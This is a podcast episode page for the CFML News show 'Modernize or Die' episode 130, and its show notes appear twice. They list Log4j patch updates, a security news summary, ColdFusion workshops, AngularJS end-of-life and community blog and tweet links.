Sign up to save your podcasts
Or
Share Modernize or Die® - CFML News for January 11th, 2022 - Episode 130
Share to email
Share to Facebook
Share to X
Share to email
Share to Facebook
Share to X
Or
Modernize or Die® - CFML News for January 11th, 2022 - Episode 130
2022-01-11 Weekly News - Episode 130
Watch the video version on YouTube at https://youtu.be/BkIKAlDLFkQ
Hosts:
Gavin Pickin - Senior Software Developer for Ortus Solutions
Eric Peterson - Senior Software Developer for Ortus Solutions
Thanks to our Sponsor - Ortus Solutions
The makers of ColdBox, CommandBox, ForgeBox, TestBox and almost every other Box out there.
A few ways to say thanks back to Ortus Solutions:
- Like and subscribe to our videos on YouTube.
- Subscribe to our Podcast on your Podcast Apps and leave us a review
- Sign up for a free or paid account on CFCasts, which is releasing new content every week
- Buy Ortus’s Book - 102 ColdBox HMVC Quick Tips and Tricks on GumRoad (http://gum.co/coldbox-tips)
Patreon Support
We have 37 patreons providing 97% of the funding for our Modernize or Die Podcasts via our Patreon site: https://www.patreon.com/ortussolutions.
News and Events
Upcoming Ortus Webinar - cbwire + Alpine.js with Grant Copley
January 28, 2022 - 11:00 AM CT - Central Time (US and Canada)
In this webinar, Grant, lead developer for cbwire, will showcase how to build modern, reactive CFML apps easily using very little JavaScript.
Register today: https://www.ortussolutions.com/events/webinars
Log4j Updates
Log4j-2.17.1 patch released. CommandBox images updates with the latest log4j patched jars
Adobe updated have an updated technote: https://helpx.adobe.com/coldfusion/kb/log4j-2-17-0-vulnerability-coldfusion.html
Other libraries like Spreadsheet-CFML have updated as well.
Note: Log4j2 Support in lucee 5.3 is coming along for 5.3.9
‘Elephant Beetle’ Lurks for Months in Networks
The group blends into an environment before loading up trivial, thickly stacked, fraudulent financial transactions too tiny to be noticed but adding up to millions of dollars.
This beetle adores Java. The group is “highly proficient” with Java-based attacks and often targets legacy Java apps running on Linux machines – primarily, the Java-based web servers WebSphere and WebLogic – as a means of initial entry to a target environment, the researchers explained. Beyond that, Elephant Beetle even deploys its own, complete Java web application to do the gang’s bidding on compromised machines that are, meanwhile, chugging along, running legitimate apps.
https://threatpost.com/elephant-beetle-months-networks-financial/177393/?fbclid=IwAR0ytUYx0IOxiNXIUE1jHvqDV0ltP_hBf7XCdEyLEYHfSaKadwf01xPkHLI
Adobe Workshops
More Adobe #ColdFusion Workshops announced, lead by Damien Bruyndonckx
2 dates announced:
February 2, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
March 09, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
https://cf-workshop.meetus.adobeevents.com/
AngularJS EOL’ed 12/31/2021
As AngularJS is faced with an uncertain future, many teams are searching for answers to the current hot topic: if you are using AngularJS, do you continue to maintain your AngularJS applications or do you migrate your applications to another framework? This is not an easy (or cheap) question to answer.
In this article, we’ll go over some of the reasons why you should consider migrating your AngularJS applications, and some ideas on how to plan and budget for a successful migration.
https://www.thisdot.co/blog/why-you-should-consider-migrating-from-angularjs-to-vue
CFCasts Content Updates
https://www.cfcasts.com
Just Released
- Into the Box 2021 are now all FREE - https://cfcasts.com/series/into-the-box-2021
Coming soon
- Into the Box LATAM
Send your suggestions at https://cfcasts.com/support
Conferences and Training
VueJS Nation Conference
Online Live Event
January 26th & 27th 2022
Register for Free
https://vuejsnation.com/
More conferences
Need more conferences, this site has a huge list of conferences for almost any language/community.
https://confs.tech/
Blogs, Tweets and Videos of the Week
Tweet - Adam Cameron - TIL something new about CFOUTPUT
I cannot go into details of why this is a good find, but I was unaware that one can pass an encoding algorithm name like `` (and a bunch of others) which will automatically escape the values in `#expression#`. Didn't know that.
https://cfdocs.org/cfoutput
https://twitter.com/adam_cameron/status/1480624980668915716
https://twitter.com/adam_cameron
Tweet - James Moberg - Microsoft taking log4j stuff seriously.
While performing some #coldfusion unit testing to identify #log4j exploit attempts (that my WAF may miss), I had to obfuscate the test strings or @msftsecurity would instantly quarantine & report the script. It's good to see that Microsoft is taking this seriously. #cfml
https://twitter.com/gamesover/status/1476347523245694984
https://twitter.com/gamesover
Blog - James Moberg - Log4j Exploit Pattern Detection Using ColdFusion/CFML
Here are my initial attempts at trying to detect Log4j exploit attempts that may make it past our WAF/service provider protections. While our WAF stopped requests from Trend Micro's Log4j Tester, obfuscated requests made it through. At time of testing, Azure wasn't blocking requests. I had to be a little careful with the script as Windows kept instantly quarantining the CFM files and prevented ColdFusion from executing the template.
2021-12-29: Updated rules based on Google Cloud article to additionally block rmi, ldaps & dns (in addition to stripping whitespace.)
https://dev.to/gamesover/log4j-exploit-pattern-detection-using-coldfusioncfml-4l17
Tweet - Zac Spitzer - Show some love for the VS Code CFML Extension
Awesome to see some activity on the vscode-cfml extension, a new minor release coming soon.
If you use it, please show some love and star the repo
https://github.com/KamasamaK/vscode-cfml
#lucee #coldfusion #cfml
https://twitter.com/zackster/status/1476206001384828929
https://twitter.com/zackster
Blog - Ben Nadel - Building An API Client With The fet...
View all episodes
By Ortus Solutions
5
77 ratings
2022-01-11 Weekly News - Episode 130
Watch the video version on YouTube at https://youtu.be/BkIKAlDLFkQ
Hosts:
Gavin Pickin - Senior Software Developer for Ortus Solutions
Eric Peterson - Senior Software Developer for Ortus Solutions
Thanks to our Sponsor - Ortus Solutions
The makers of ColdBox, CommandBox, ForgeBox, TestBox and almost every other Box out there.
A few ways to say thanks back to Ortus Solutions:
- Like and subscribe to our videos on YouTube.
- Subscribe to our Podcast on your Podcast Apps and leave us a review
- Sign up for a free or paid account on CFCasts, which is releasing new content every week
- Buy Ortus’s Book - 102 ColdBox HMVC Quick Tips and Tricks on GumRoad (http://gum.co/coldbox-tips)
Patreon Support
We have 37 patreons providing 97% of the funding for our Modernize or Die Podcasts via our Patreon site: https://www.patreon.com/ortussolutions.
News and Events
Upcoming Ortus Webinar - cbwire + Alpine.js with Grant Copley
January 28, 2022 - 11:00 AM CT - Central Time (US and Canada)
In this webinar, Grant, lead developer for cbwire, will showcase how to build modern, reactive CFML apps easily using very little JavaScript.
Register today: https://www.ortussolutions.com/events/webinars
Log4j Updates
Log4j-2.17.1 patch released. CommandBox images updates with the latest log4j patched jars
Adobe updated have an updated technote: https://helpx.adobe.com/coldfusion/kb/log4j-2-17-0-vulnerability-coldfusion.html
Other libraries like Spreadsheet-CFML have updated as well.
Note: Log4j2 Support in lucee 5.3 is coming along for 5.3.9
‘Elephant Beetle’ Lurks for Months in Networks
The group blends into an environment before loading up trivial, thickly stacked, fraudulent financial transactions too tiny to be noticed but adding up to millions of dollars.
This beetle adores Java. The group is “highly proficient” with Java-based attacks and often targets legacy Java apps running on Linux machines – primarily, the Java-based web servers WebSphere and WebLogic – as a means of initial entry to a target environment, the researchers explained. Beyond that, Elephant Beetle even deploys its own, complete Java web application to do the gang’s bidding on compromised machines that are, meanwhile, chugging along, running legitimate apps.
https://threatpost.com/elephant-beetle-months-networks-financial/177393/?fbclid=IwAR0ytUYx0IOxiNXIUE1jHvqDV0ltP_hBf7XCdEyLEYHfSaKadwf01xPkHLI
Adobe Workshops
More Adobe #ColdFusion Workshops announced, lead by Damien Bruyndonckx
2 dates announced:
February 2, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
March 09, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
https://cf-workshop.meetus.adobeevents.com/
AngularJS EOL’ed 12/31/2021
As AngularJS is faced with an uncertain future, many teams are searching for answers to the current hot topic: if you are using AngularJS, do you continue to maintain your AngularJS applications or do you migrate your applications to another framework? This is not an easy (or cheap) question to answer.
In this article, we’ll go over some of the reasons why you should consider migrating your AngularJS applications, and some ideas on how to plan and budget for a successful migration.
https://www.thisdot.co/blog/why-you-should-consider-migrating-from-angularjs-to-vue
CFCasts Content Updates
https://www.cfcasts.com
Just Released
- Into the Box 2021 are now all FREE - https://cfcasts.com/series/into-the-box-2021
Coming soon
- Into the Box LATAM
Send your suggestions at https://cfcasts.com/support
Conferences and Training
VueJS Nation Conference
Online Live Event
January 26th & 27th 2022
Register for Free
https://vuejsnation.com/
More conferences
Need more conferences, this site has a huge list of conferences for almost any language/community.
https://confs.tech/
Blogs, Tweets and Videos of the Week
Tweet - Adam Cameron - TIL something new about CFOUTPUT
I cannot go into details of why this is a good find, but I was unaware that one can pass an encoding algorithm name like `` (and a bunch of others) which will automatically escape the values in `#expression#`. Didn't know that.
https://cfdocs.org/cfoutput
https://twitter.com/adam_cameron/status/1480624980668915716
https://twitter.com/adam_cameron
Tweet - James Moberg - Microsoft taking log4j stuff seriously.
While performing some #coldfusion unit testing to identify #log4j exploit attempts (that my WAF may miss), I had to obfuscate the test strings or @msftsecurity would instantly quarantine & report the script. It's good to see that Microsoft is taking this seriously. #cfml
https://twitter.com/gamesover/status/1476347523245694984
https://twitter.com/gamesover
Blog - James Moberg - Log4j Exploit Pattern Detection Using ColdFusion/CFML
Here are my initial attempts at trying to detect Log4j exploit attempts that may make it past our WAF/service provider protections. While our WAF stopped requests from Trend Micro's Log4j Tester, obfuscated requests made it through. At time of testing, Azure wasn't blocking requests. I had to be a little careful with the script as Windows kept instantly quarantining the CFM files and prevented ColdFusion from executing the template.
2021-12-29: Updated rules based on Google Cloud article to additionally block rmi, ldaps & dns (in addition to stripping whitespace.)
https://dev.to/gamesover/log4j-exploit-pattern-detection-using-coldfusioncfml-4l17
Tweet - Zac Spitzer - Show some love for the VS Code CFML Extension
Awesome to see some activity on the vscode-cfml extension, a new minor release coming soon.
If you use it, please show some love and star the repo
https://github.com/KamasamaK/vscode-cfml
#lucee #coldfusion #cfml
https://twitter.com/zackster/status/1476206001384828929
https://twitter.com/zackster
Blog - Ben Nadel - Building An API Client With The fet...